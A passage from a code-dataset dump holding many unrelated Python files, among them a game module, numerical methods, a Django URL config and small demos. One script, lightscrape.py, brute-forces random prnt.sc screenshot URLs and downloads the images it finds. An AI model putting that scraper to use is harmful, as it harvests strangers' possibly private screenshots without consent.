_FakeSaveHeroResult(object):\n __slots__ = ['id_range', 'actual_heros', 'to_souls']\n def __init__(self):\n self.id_range = []\n self.actual_heros = []\n self.to_souls = []\n\n def __bool__(self):\n return False\n __nonzero__ = __bool__\n\n\nFakeSaveHeroResult = _FakeSaveHeroResult()\n\n\n\ndef get_char_hero_oids(char_id):\n heros = MongoHero.objects.filter(char=char_id)\n return [h.oid for h in heros]\n\ndef save_hero(char_id, hero_original_ids, add_notify=True):\n if not isinstance(hero_original_ids, (list, tuple)):\n hero_original_ids = [hero_original_ids]\n\n char_hero_oids = get_char_hero_oids(char_id)\n\n to_soul_hero_ids = []\n for h in hero_original_ids[:]:\n if h in char_hero_oids:\n to_soul_hero_ids.append(h)\n hero_original_ids.remove(h)\n\n souls = {}\n if to_soul_hero_ids:\n for sid in to_soul_hero_ids:\n this_hero = HEROS[sid]\n souls[this_hero.id] = souls.get(this_hero.id, 0) + 1\n\n for k in souls.keys():\n souls[k] *= external_calculate.Hero.step_up_using_soul_amount(HEROS[k].quality)\n\n hs = HeroSoul(char_id)\n hs.add_soul(souls.items())\n\n hero_to_soul_signal.send(\n sender=None,\n char_id=char_id,\n souls=souls.items(),\n )\n\n id_range = []\n if hero_original_ids:\n length = len(hero_original_ids)\n id_range = id_generator('charhero', length)\n for i, _id in enumerate(id_range):\n MongoHero(id=_id, char=char_id, oid=hero_original_ids[i], step=HERO_START_STEP, progress=0).save()\n\n hero_add_signal.send(\n sender=None,\n char_id=char_id,\n hero_ids=id_range,\n hero_original_ids=hero_original_ids,\n send_notify=add_notify,\n )\n\n res = _SaveHeroResult()\n res.id_range = id_range\n res.actual_heros = [(oid, 1) for oid in hero_original_ids]\n res.to_souls = souls.items()\n return res\n\n\ndef recruit_hero(char_id, _id):\n if _id not in HEROS:\n raise SanguoException(\n errormsg.SOUL_CAN_NOT_RECRUIT,\n char_id,\n \"Recruit Hero\",\n \"Soul {0} not exist\".format(_id)\n )\n\n char_hero_oids = get_char_hero_oids(char_id)\n if _id in char_hero_oids:\n raise SanguoException(\n errormsg.SOUL_CAN_NOT_RECRUIT,\n char_id,\n \"Recruit Hero\",\n \"Hero {0} already exist\".format(_id)\n )\n\n\n soul_amount = external_calculate.Hero.step_up_using_soul_amount(HEROS[_id].quality)\n hs = HeroSoul(char_id)\n hs.remove_soul([(_id, soul_amount)])\n\n save_hero(char_id, [_id])\n\n","sub_path":"sanguo/core/hero.py","file_name":"hero.py","file_ext":"py","file_size_in_byte":14254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"350415459","text":"\"\"\"Modulo que contiene el codigo para construir el Polinomio Interpolante de Lagrange\"\"\"\n\nfrom sage.all import SR, sage, round\nimport sys\nimport numpy as np\nfrom Mods_Preparar_Metodos.Preparar_Programa import LLenar_Matriz_Datos, OpcionesLag\n\ndef Interpolacion_Lagrange(nombre):\n \"\"\"Funcion que construira el Polinomio Interpolante de Lagrange\"\"\"\n # Primero llena una matriz con los datos contenidos en el documento de texto\n matDatos = LLenar_Matriz_Datos(nombre)\n\n # Manda a llamar a la funcion 'Opciones' para pedir al usuario que elija una opcion para usar la formula de lagrange, saber cuales son\n # los datos que el usuario desea elegir y para almacenar los indices de las filas de 'matDatos' que se van a usar en 'indicesDatos'\n indicesDatos = OpcionesLag(matDatos)\n\n # Revisa el contenido del primer elemento de 'indicesDatos' para saber que opcion eligio el usuario\n if indicesDatos[0] == 1 or indicesDatos[0] == 2: # Construye el Polinomio Interpolante de Lagrange\n opcionAux = indicesDatos[0]\n # Elimina el primer elemento de 'indicesDatos'\n indicesDatos = indicesDatos[1:]\n # Ordena los indices de forma ascendente y elimina los valores duplicados\n indicesDatos = list(set(indicesDatos))\n\n # Crea la lista que contendra los polinomios de lagrange\n PolinomiosInterLag = list()\n\n # Declara las variables que contendran la expresiones que estaran en el numerador y en el denominador de cada polinomio de lagrange\n numerador = \"\"\n denominador = \"\"\n\n cont = 0\n # Bucle que construye el polinomio interpolante de lagrange\n for elemento in indicesDatos:\n # Bucle que construira el numerador\n for elemNum in indicesDatos:\n # Condicional que se saltara este paso en caso de que lleguemos al elemento que no ira en el numerdor\n if elemNum == elemento:\n # Almacena en la variable 'elemFunAux' el indice del valor que estamos saltando para despues\n # usarlo al multiplicar los polinomio interpolantes por el valor de la funcion en ese punto\n elemFunAux = elemNum\n continue\n else:\n numerador += f\"(x - {matDatos[elemNum, 0]})*\"\n # Elimina el ultimo signo '*' de la cadena almacenada en la variable 'numerador'\n numerador = \"(\" + numerador[:(len(numerador) - 1)] + \")\"\n\n # Bulce que construira el denominador\n for elemDen in indicesDatos:\n # Condicional que se saltara este paso en caso de que lleguemos al elemento que no ira en el numerdor\n if elemDen == elemento:\n continue\n else:\n denominador += f\"({matDatos[elemento, 0]} - {matDatos[elemDen, 0]})*\"\n # Elimina el ultimo signo '*' de la cadena almacenada en la variable 'denominador'\n denominador = \"(\" + denominador[:(len(denominador) - 1)] + \")\"\n\n # Agrega a la lista de polinomio el polinomio que se forma con el numerador y el denominador de los bucles anteriores\n PolinomiosInterLag.append(f\"{numerador} / {denominador}\")\n\n numerador = \"\"\n denominador = \"\"\n\n # Multiplica el polinomio interpolante de lagrange por el valor de la funcion \n PolinomiosInterLag[cont] = \"(\" + f\"({round(matDatos[elemFunAux, 1], 6)}) * \" + f\"({PolinomiosInterLag[cont]})\" + \")\"\n\n cont += 1\n\n # Declara variable que contendra el polinomio aplicando la formula de lagrange\n polinomio = \"\"\n\n # Bucle que convertira de formato 'srt' a formato de sagemath los polinomios obtenidos por los bucles anteriores y los sumara\n for pol in PolinomiosInterLag:\n polinomio += pol + \"+\"\n\n # Elimina el ultimo signo '+' de la cadena almacenada en la variable 'polinomio'\n polinomio = polinomio[:(len(polinomio) - 1)]\n\n if opcionAux == 1: # Convierte la cadena de caracteres que contiene el polinomio en formato de sagemath\n polinomio = SR(polinomio)\n\n # Simplifica el polinomio resultante y lo imprime\n print(f\"\\n\\nEl Polinomio Interpolante es: {polinomio.simplify_full()}\\n\")\n\n else: # Sustituye el punto que se quiere calcular por las 'x' que aparecen en la cadena de caracteres que contiene el polinomio\n x = float(input(\"\\nIngresa una abscisa: \")) # Pide al usuario una abscisa\n polinomio = polinomio.replace('x', str(x))\n polinomio = SR(polinomio)\n\n # Simplifica el resultado y lo imprime redondeandolo a 8 decimales\n print(f\"\\n\\nEl valor de la funcion en el punto {x} es aproximadamente: {round(polinomio.simplify_full(), 8)}\\n\")\n\n #elif indicesDatos[0] == 3: # Aplica el metodo de Neville\n # print(\"nada\")\n\ndef Lagrange():\n fNombre = input(\"Escribe el nombre del archivo sin escribir la extension '.txt': \")\n Interpolacion_Lagrange(fNombre)\n\nif __name__ == \"__main__\":\n Interpolacion_Lagrange(\"prueba\")","sub_path":"Mets6_IntYAproxPol/Met1_PolInterLagMain.py","file_name":"Met1_PolInterLagMain.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"207341497","text":"from tools.load import LoadMatrix\nfrom sg import sg\nlm=LoadMatrix()\n\ntraindat=lm.load_numbers('../data/fm_train_real.dat')\nparameter_list=[[traindat,10,3],[traindat,11,4]]\ndef clustering_hierarchical (fm_train=traindat, size_cache=10,merges=3):\n\n\tsg('set_features', 'TRAIN', fm_train)\n\tsg('set_distance', 'EUCLIDIAN', 'REAL')\n\tsg('new_clustering', 'HIERARCHICAL')\n\tsg('train_clustering', merges)\n\n\t[merge_distance, pairs]=sg('get_clustering')\n\treturn [merge_distance, pairs]\n\nif __name__=='__main__':\n\tprint('Hierarchical')\n\tclustering_hierarchical(*parameter_list[0])\n","sub_path":"build/shogun_lib/examples/undocumented/python_static/clustering_hierarchical.py","file_name":"clustering_hierarchical.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"289357199","text":"# Описать метод PowerA234(A,B,C,D) вычисляющий вторую, \n# третью и четвертую степень числа A и возвращающий\n# эти степени соответственно в переменных B C D\n# А - входной параметр B C D - выходные. Все параметры вещественные\n# С помощью этого метода найти вторую, третью и четвертую степень\n# пяти данных чисел\n\n\ndef power_a():\n try:\n a = float(input('Enter number: '))\n b = a ** 2\n c = a ** 3\n d = a ** 4\n return b, c, d\n except ValueError:\n return 'Use only numbers'\n\n\ni = 5\nwhile i > 0:\n print(power_a())\n i -= 1\n","sub_path":"lesson5/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"395665862","text":"import sqlite3\r\nfrom sqlite3 import Error\r\n\r\ndef create_connection(db_file):\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n print(sqlite3.version)\r\n return conn\r\n except Error as e:\r\n print(e)\r\n return None\r\n\r\ndef create_task(conn, task):\r\n sql = ''' INSERT INTO tutorial_ticket(id,plugin_id,date,hostname,ip_address,plugin_name)\r\n VALUES(?,?,?,?,?,?) '''\r\n cur = conn.cursor()\r\n cur.execute(sql, task)\r\n return cur.lastrowid\r\n\r\ndef main():\r\n database = \"db.sqlite3\"\r\n conn = create_connection(database)\r\n with conn:\r\n task = ('6','97000','2019-01-07 13:02:15','sbibpl_gns.ad.trw.com','192.168.1.1','NFS Vulnerability')\r\n create_task(conn, task)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"update_db.py","file_name":"update_db.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"133852254","text":"from django.urls import path\n\nfrom .views import (\n DetailPlantings,\n client_index,\n coopdetailPlantings,\n plants_par_section,\n projet,\n detail_proj,\n localisation,\n detail_coop,\n # chart,\n prod_coop,\n parcelle_coop,\n localisation_coop,\n section_coop,\n sous_section_coop,\n planting_coop, formations,\n detail_formation,\n export_prod_xls,\n export_parcelle_xls,\n export_prods_to_pdf,\n export_parcelles_to_pdf,\n Plantings,\n # export_plant_xls,\n # export_formation_xls,\n # export_prods_to_pdf,\n # export_parcelles_to_pdf,\n # producteursPDF\n)\n\napp_name='clients'\n\n\nurlpatterns = [\n # path('', connexion, name='connexion'),\n # path('logout', loggout, name='logout'),\n path('index/', client_index, name='dashboard'),\n path('projets/', projet, name='projets'),\n path('formation/', formations, name='formations'),\n path('formation//', detail_formation, name='formation'),\n path('producteurs/', prod_coop, name='prod_coop'),\n path('parcelles/', parcelle_coop, name='parcelle_coop'),\n path('sections/', section_coop, name='section_coop'),\n path('sous_sections/', sous_section_coop, name='sous_section_coop'),\n path('planting/', planting_coop, name='planting_coop'),\n path('coordonnes/', localisation_coop, name='localisation_coop'),\n path('localisation/', localisation, name='localisation'),\n path('Plantings/', Plantings, name='Plantings'),\n path('DetailPlantings/', DetailPlantings, name='DetailPlantings'),\n path('coopdetailPlantings/', coopdetailPlantings, name='coopdetailPlantings'),\n path('plants_par_section/', plants_par_section, name='plants_par_section'),\n \n # path('site_pepinieres/', site_pepinieres, name='site_pepinieres'),\n # path('coop_pepiniere/', coop_pepiniere, name='coop_pepiniere'),\n path('detail_proj/', detail_proj, name='detail_proj'),\n path('detail_coop/', detail_coop, name='detail_coop'),\n # #Charts\n # path('Stats_coop/', Stats_coop, name='stats_coop'),\n # path('Stats_semences/', Stats_semences, name='stats_semences'),\n # path('Production_plan/', Production_plan, name='production_plan'),\n # path('plants_coop/', plants_coop, name='plants_coop'),\n # path('semences_coop/', semences_coop, name='semences_coop'),\n # path('chart/', chart, name='chart'),\n #\n # #Export to Excel\n path('cooperative//producteurs/xls/', export_prod_xls, name='export_prod_xls'),\n # # path('sections/xls/', export_section_xls, name='export_section_xls'),\n # # path('sous_sections/xls/', export_sous_section_xls, name='export_sous_section_xls'),\n path('cooperative//parcelles/xls/', export_parcelle_xls, name='export_parcelle_xls'),\n # path('cooperative//plants/xls/', export_plant_xls, name='export_plant_xls'),\n # path('cooperative//formations/xls/', export_formation_xls, name='export_formation_xls'),\n #\n # # Export Données EN PDF\n path('producteurs/pdf/', export_prods_to_pdf, name='export_prods_to_pdf'),\n # path('producteurs/pdf/', producteursPDF, name='prods_to_pdf'),\n path('parcelles/pdf/', export_parcelles_to_pdf, name='export_parcelles_to_pdf'),\n]\n","sub_path":"clients/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"495737861","text":"\"\"\"\nGiven a set of items, each with an arbitrary positive weight and a value = 1 or 2 ,\ndetermine which items to include in a collection so that the total weight is less than\nor equal to a given limit and the total value is as large as possible.\n\nFind a polynomial algorithm.\n--\noption:\nstandard knapsack\nbest(weight, with_item) -> best(weight, without_item), best(weight-i, without_item)+ val(item)\n\nat the end, gather\n\"\"\"\nimport collections\n\n\ndef res_knapsack(weights, vals, limit):\n ones = []\n twos = []\n for idx, v in enumerate(vals):\n if v == 1:\n ones.append((weights[idx], idx))\n else:\n twos.append((weights[idx], idx))\n\n ones = collections.deque(sorted(ones))\n twos = collections.deque(sorted(twos))\n\n last_one = None\n weight = 0\n added = set()\n while len(ones) >= 2 and twos:\n one_val = ones[0][0] + ones[1][0]\n two_val = twos[0][0]\n if weight + min(one_val, two_val) > limit:\n break\n if two_val <= one_val:\n w, idx = twos.popleft()\n weight += w\n added.add(idx)\n else:\n w1, idx1 = ones.popleft()\n w2, idx2 = ones.popleft()\n weight += w1 + w2\n added.add(idx1)\n added.add(idx2)\n last_one = (w2, idx2)\n\n while twos and weight + twos[0][0] <= limit:\n w, idx = twos.popleft()\n weight += w\n added.add(idx)\n\n while ones and weight + ones[0][0] <= limit:\n w, idx = ones.popleft()\n weight += w\n added.add(idx)\n last_one = (w, idx)\n\n if last_one:\n if weight - last_one[0] + twos[0][0] <= limit:\n one_w, one_idx = last_one\n weight -= one_w\n added.remove(one_idx)\n two_w, two_idx = twos.popleft()\n weight += two_w\n added.add(two_idx)\n\n return added\n","sub_path":"lc_discuss/old/batch_2c/restricted_knapsack.py","file_name":"restricted_knapsack.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"1477314","text":"\"\"\"Global variables to store the count of the letters and words\"\"\"\nwordsDict = {}\nlettersDict = {}\n\n\ndef cleanupLine(line):\n \"\"\"this function will remove characters that are not needed from the line-string. Unwanted characters are all characters except a-z, A-Z, 0-9 and ' and should be replaced with a space\n long-term -> long term\n It's amazing, isn't it? -> Is's amazaing isn't it\n Note, if you are familiar with regex, you can use that, otherwise a loop is fine\"\"\"\n stripped_line = \"\"\n # print(line)\n result = []\n for character in line:\n \"\"\"Get the ascii code of the character\"\"\"\n ascii = ord(character)\n \"\"\"One way to check if the letter is our target (a-z, A-Z, 0-9 and ') is\n check their ascii code. ascii code 48 - 57 is 0 - 9, 65 - 90 is A-Z,\n 97 - 122 is a-z and 39 is '.\"\"\"\n if (ascii >= 48 and ascii <= 57) or \\\n (ascii >= 65 and ascii <= 90) or \\\n (ascii >= 97 and ascii <= 122) or \\\n (ascii == 39):\n \"\"\"characters in the scopes given will be appended to list as is\"\"\"\n result.append(character)\n else:\n \"\"\"Any thing outside this ranges will \n considered as not target and will be replaced with a space.\"\"\"\n result.append(\" \")\n stripped_line = \"\".join(result)\n return stripped_line\n\n\ndef countWords(line):\n \"\"\"For a stripped line, this function counts the words and updates\n the globla variable wordsDict{}.\n Note, we convert upper case words to lower case words\"\"\"\n global wordsDict\n\n \"\"\"Using string.split() fuction to get a list of words of the line\"\"\"\n for word in line.split():\n \"\"\"Convert the word into lower case\"\"\"\n target = word.lower()\n \"\"\"Check whether the targetr word exist in the dictionary or not.\"\"\"\n if target in wordsDict.keys():\n \"\"\"If the target word exist in the dictionary,\n then get the current count and increment by 1 then \n store back to the dictionary\"\"\"\n wordsDict[target] += 1\n else:\n \"\"\"If the target word not exists in the ductionary,\n then set 1 and store back to dictionary\"\"\"\n wordsDict[target] = 1\n\n return wordsDict\n\n\ndef countLetters(line):\n \"\"\"For a stripped line, this function counts the letters and updates\n the globla variable lettersDict{}.\n Note, we convert upper case letters to lower case\n Note2, numbers and ' should be ignored\"\"\"\n global lettersDict\n for character in line:\n \"\"\"Conver all character into lower case\"\"\"\n target = character.lower()\n\n ascii = ord(target)\n \"\"\"Check whether the target character is number or ', \n if yes, then skip the target and get next character.\"\"\"\n \"\"\"Need clarification\"\"\"\n if (ascii >= 48 and ascii <= 57) or \\\n (ascii == 39):\n continue\n\n \"\"\"Check whether the target character is in the dictionary already\"\"\"\n if target in lettersDict.keys():\n \"\"\"If the target character exist in the dictionary, \n then get the current count and plus 1\"\"\"\n lettersDict[target] += 1\n else:\n \"\"\"If the target character not exist in the dictionary, \n then set the count to 1\"\"\"\n lettersDict[target] = 1\n\n return lettersDict\n\n\ndef readFiles(filename):\n handle = open(filename, 'r')\n for line in handle:\n stripped_line = cleanupLine(line)\n countWords(stripped_line)\n countLetters(stripped_line)\n\n\ndef results():\n return [6209, 1566, 1205, 302, 132, 334]\n","sub_path":"tw/idv/sang/repl/AS3-Frequency.py","file_name":"AS3-Frequency.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"650926333","text":"# coding: utf-8\n\"\"\"*****************************************************************************\n* Copyright (C) 2018 Microchip Technology Inc. and its subsidiaries.\n*\n* Subject to your compliance with these terms, you may use Microchip software\n* and any derivatives exclusively with Microchip products. It is your\n* responsibility to comply with third party license terms applicable to your\n* use of third party software (including open source software) that may\n* accompany Microchip software.\n*\n* THIS SOFTWARE IS SUPPLIED BY MICROCHIP \"AS IS\". NO WARRANTIES, WHETHER\n* EXPRESS, IMPLIED OR STATUTORY, APPLY TO THIS SOFTWARE, INCLUDING ANY IMPLIED\n* WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY, AND FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n* IN NO EVENT WILL MICROCHIP BE LIABLE FOR ANY INDIRECT, SPECIAL, PUNITIVE,\n* INCIDENTAL OR CONSEQUENTIAL LOSS, DAMAGE, COST OR EXPENSE OF ANY KIND\n* WHATSOEVER RELATED TO THE SOFTWARE, HOWEVER CAUSED, EVEN IF MICROCHIP HAS\n* BEEN ADVISED OF THE POSSIBILITY OR THE DAMAGES ARE FORESEEABLE. TO THE\n* FULLEST EXTENT ALLOWED BY LAW, MICROCHIP'S TOTAL LIABILITY ON ALL CLAIMS IN\n* ANY WAY RELATED TO THIS SOFTWARE WILL NOT EXCEED THE AMOUNT OF FEES, IF ANY,\n* THAT YOU HAVE PAID DIRECTLY TO MICROCHIP FOR THIS SOFTWARE.\n*****************************************************************************\"\"\"\n\nglobal debugID\n\n###################################################################################################\n########################################## Callbacks #############################################\n###################################################################################################\n\ndef onAttachmentConnected(source, target):\n\n global debugID\n\n localComponent = source[\"component\"]\n remoteComponent = target[\"component\"]\n remoteID = remoteComponent.getID()\n connectID = source[\"id\"]\n targetID = target[\"id\"]\n\n remoteComponent.setSymbolValue(\"USART_INTERRUPT_MODE\", False, 2)\n debugID.setValue(remoteID, 2)\n\ndef onAttachmentDisconnected(source, target):\n\n global debugID\n\n localComponent = source[\"component\"]\n remoteComponent = target[\"component\"]\n remoteID = remoteComponent.getID()\n connectID = source[\"id\"]\n targetID = target[\"id\"]\n\n debugID.clearValue()\n\n###################################################################################################\n########################################## Component #############################################\n###################################################################################################\n\ndef instantiateComponent(debugComponent):\n\n global debugID\n\n debugID = debugComponent.createStringSymbol(\"SECURE_DEBUG_PERIPHERAL\", None)\n debugID.setVisible(False)\n","sub_path":"arch/stdio/config/stdio_secure.py","file_name":"stdio_secure.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"15287977","text":"speed = float(input())\na = (\"slow\", \"average\", \"fast\", \"ultra fast\", \"extremely fast\")\ncoefficient = 0\nif speed <= 10:\n coefficient = 0\nelif 10 < speed <= 50:\n coefficient = 1\nelif 50 < speed <= 150:\n coefficient = 2\nelif 150 < speed <= 1000:\n coefficient = 3\nelse:\n coefficient = 4\nprint(a[coefficient])\n","sub_path":"Python-Basic/Ex_lec_3_conditional_statements/03_Speed_Info.py","file_name":"03_Speed_Info.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"620358544","text":"import PyPDF2\n\npdfReader = PyPDF2.PdfFileReader(open('encrypted.pdf', 'rb'))\n\nprint('pdfReader.isEncrypted: %s' %(pdfReader.isEncrypted))\n\n# The following line will fail fail because the 'encrypted.pdf' file is\n# encrypted with a password of 'rosebud' (The Sims money cheat reference)\n\n# print('Attempting to get the first page from the encrypted PDF: pdfReader.getPage(0): %s' %(pdfReader.getPage(0)))\n\npdfReader.decrypt('rosebud')\n\npageObj = pdfReader.getPage(0)\n\nprint('pageObj: %s' %(pageObj))\n\n\n","sub_path":"python/03AutomateTheBoringStuffWithPython/13WorkingWithPDFAndWordDocuments/02DecryptingPDFs.py","file_name":"02DecryptingPDFs.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"551570972","text":"from selenium import webdriver\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\nimport wget, random, string, os, selenium, sys, platform\n\noptions = Options()\noptions.add_argument(\"--headless\")\noptions.add_argument(\"--window-size=1920x1080\")\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\n\nBASE_URL = 'https://prnt.sc/'\nlower_alphabet = string.ascii_lowercase\n\nif platform.system() == 'Windows':\n webdriver = \"chromedriver.exe\"\nelif platform.system() == 'Linux':\n webdriver = \"chromedriver\"\nelse:\n print(\"Not supported OS. (Only Windows and Linux)\")\n\ndriver = Chrome(options=options, executable_path=webdriver)\n\ntry:\n os.mkdir('shots')\nexcept:\n print('Dir \"shots\" exists')\nfinally:\n os.chdir('shots')\n\ndef randNL():\n list = []\n for i in range(6):\n choise = random.randint(0,1)\n if choise == 0:\n list.append(random.randint(0,9))\n else:\n list.append(random.choice(lower_alphabet))\n END_URL = ''.join(map(str, list))\n return END_URL\n\ndef main(i):\n for n in range(int(i)):\n while True:\n driver.get(BASE_URL+randNL())\n try:\n img = driver.find_element_by_id('screenshot-image').get_attribute('src')\n if img.__contains__('imgur'):\n print('\\n{}.'.format(str(n+1)))\n wget.download(img)\n break\n except selenium.common.exceptions.NoSuchElementException:\n print('\\nElement not found')\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n","sub_path":"lightscrape.py","file_name":"lightscrape.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"266831972","text":"\"\"\"Module for Protein Alternate classification.\"\"\"\nimport re\nfrom typing import Optional\n\nfrom bioutils.sequences import aa3_to_aa1_lut\n\nfrom variation.schemas.token_response_schema import Token, TokenMatchType\nfrom .tokenizer import Tokenizer\n\n\nclass ProteinAlternate(Tokenizer):\n \"\"\"The Protein Alternate Tokenization class.\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initialize the Protein Alternate Tokenizer class.\"\"\"\n self.__splitter = re.compile(r\"\\d+\")\n\n def match(self, input_string: str) -> Optional[Token]:\n \"\"\"Return Protein Alternate tokens if input string matches.\"\"\"\n potential_protein = self.__splitter.split(input_string)\n if all((len(potential_protein) == 2,\n potential_protein[0] in aa3_to_aa1_lut,\n not potential_protein[1])):\n return Token(\n token=potential_protein[0],\n token_type=\"ProteinAlternate\",\n input_string=input_string,\n match_type=TokenMatchType.UNSPECIFIED\n )\n else:\n return None\n","sub_path":"variation/tokenizers/protein_alternate.py","file_name":"protein_alternate.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"142386976","text":"import sys\nimport typesense\nimport unicodedata\n\nfileName = sys.argv[1]\n\nclient = typesense.Client({\n 'nodes': [{\n 'host': 'localhost', # For Typesense Cloud use xxx.a1.typesense.net\n 'port': '8108', # For Typesense Cloud use 443\n 'protocol': 'http' # For Typesense Cloud use https\n }],\n 'api_key': 'xyz',\n 'connection_timeout_seconds': 2\n})\n\n# print(fileName)\ndata = open(fileName,'r').read()\n# jsonl_file = jsonl_file.encode('latin-1', 'replace')\n\n\n# print(data[5861456:5861476])\n# print(str(unicodedata.normalize('NFKD', jsonl_file[5814010:5814020]).encode('ascii', 'ignore')))\n# data = unicodedata.normalize('NFKD', jsonl_file).encode('ascii', 'ignore').decode(\"utf-8\")\n\nreturn_data = client.collections['blogs'].documents.import_(data)\nprint('Documents length: ', len(data.split('\\n'))-1)\nprint('Sucessfully added: ', return_data.count('true'))\n\n","sub_path":"addDocuments.py","file_name":"addDocuments.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"145982517","text":"from turtle import *\nfrom math import cos,pi\n\"\"\"\n用小圆圈围成大圆圈\n\"\"\"\nx,y=0,0\ndef t(r=10,n=6):\n\tglobal x,y\n\tspeed(0)\n\tfor i in range(n):\n\t\tif i==0:\n\t\t\tx,y=pos()\n\t\tpendown()\n\t\tcircle(r)\n\t\tpenup()\n\t\tright(360/n)\n\t\tang=(180-360/n)/2\n\t\tforward(r*(2-2*(cos(ang/180*pi))))\ndef c(l,r=5,n=36):\n\ts=2*r\n\tfor i in range(l):\n\t\tt(r=r,n=n)\n\t\tpenup()\n\t\thome()\n\t\tleft(90)\n\t\tforward(s)\n\t\ts+=2*r\n\t\tsetheading(0)\n\t\tang=(180-360/n)/2\n\t\tk=cos(ang/180*pi)\n\t\tr=r*((1+k)/(1-k))\n\tdone()\nc(6)","sub_path":"demo/turtledemo/draw_cycle.py","file_name":"draw_cycle.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"34536151","text":"#silnia liczona rekurencyjnie\n#n!=n*(n-1!)\ndef silnia(n):\n if n==0 or n==1:\n return 1\n else:\n return n*silnia(n-1)\nn = int(input(\"Podaj liczbe calkowita dodatnia n < 20 \\n\"))\nwhile n<0 or n>20:\n print(\"Podales licze spoza zakresu\")\n break\nelse:\n a = silnia(n)\n print('silnia liczby', n, '! = ', a)\n","sub_path":"lekcja7.silnia.rekurencyjna.py","file_name":"lekcja7.silnia.rekurencyjna.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"450032963","text":"import pygame\n\npygame.init()\n\nSCREEN_SIZE = 500\nSTEP = 20\n\nscreen = pygame.display.set_mode((SCREEN_SIZE, SCREEN_SIZE))\n\n\nrunning = 1\n\nwhile running:\n event = pygame.event.poll()\n if event.type == pygame.QUIT:\n running = 0\n\n screen.fill((0, 0, 0))\n for y in range(SCREEN_SIZE // STEP):\n pygame.draw.line(screen, (255, 0, 255), (0, y * STEP), (SCREEN_SIZE - y * STEP, 0))\n\n pygame.display.flip()\n","sub_path":"src/lesson07/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"477692635","text":"'''Attempt to set a material on the kitchen fridge'''\n\nimport os\nimport argparse\n\nfrom pxr import Gf, Kind, Sdf, Usd, UsdGeom, UsdShade\n\n\nEXPORT_NAME = 'KitchenFridgeMaterial.usda'\nTEXTURE_FILE = os.path.abspath('../textures/UV_Grid_Sm.jpg')\nFRIDGE_PATH = '/Kitchen_set/Props_grp/North_grp/FridgeArea_grp/Refridgerator_1/Geom/Body'\n\ndef get_parser():\n parser = argparse.ArgumentParser(description='Add a texture to a Kitchen scene table save it')\n\n parser.add_argument('kitchen', help='Kitchen set file location')\n\n return parser\n\ndef make_material(stage, path):\n # Create material\n material = UsdShade.Material.Define(stage, path)\n mat_path = material.GetPath()\n stInput = material.CreateInput('frame:stPrimvarName', Sdf.ValueTypeNames.Token)\n stInput.Set('st')\n\n pbrShader = UsdShade.Shader.Define(stage, mat_path.AppendPath('PBRShader'))\n pbrShader.CreateIdAttr('UsdPreviewSurface')\n\n stReader = UsdShade.Shader.Define(stage, mat_path.AppendPath('stReader'))\n stReader.CreateIdAttr('UsdPrimvarReader_float2')\n stReader.CreateInput('varname',Sdf.ValueTypeNames.Token).ConnectToSource(stInput)\n\n diffuseTextureSampler = UsdShade.Shader.Define(stage, mat_path.AppendPath('diffuseTexture'))\n diffuseTextureSampler.CreateIdAttr('UsdUVTexture')\n diffuseTextureSampler.CreateInput('file', Sdf.ValueTypeNames.Asset).Set(TEXTURE_FILE)\n diffuseTextureSampler.CreateInput('st', Sdf.ValueTypeNames.Float2).ConnectToSource(stReader, 'result')\n diffuseTextureSampler.CreateOutput('rgb', Sdf.ValueTypeNames.Float3)\n pbrShader.CreateOutput('diffuseColor', Sdf.ValueTypeNames.Color3f).ConnectToSource(diffuseTextureSampler, 'rgb')\n\n material.CreateSurfaceOutput().ConnectToSource(pbrShader, 'surface')\n\n return material\n\ndef main():\n\n parser = get_parser()\n\n args = parser.parse_args()\n\n # Make the stage\n stage = Usd.Stage.Open(os.path.abspath(args.kitchen))\n\n # Create material\n material = make_material(stage, FRIDGE_PATH + '/grid_material')\n\n # Bind materials\n 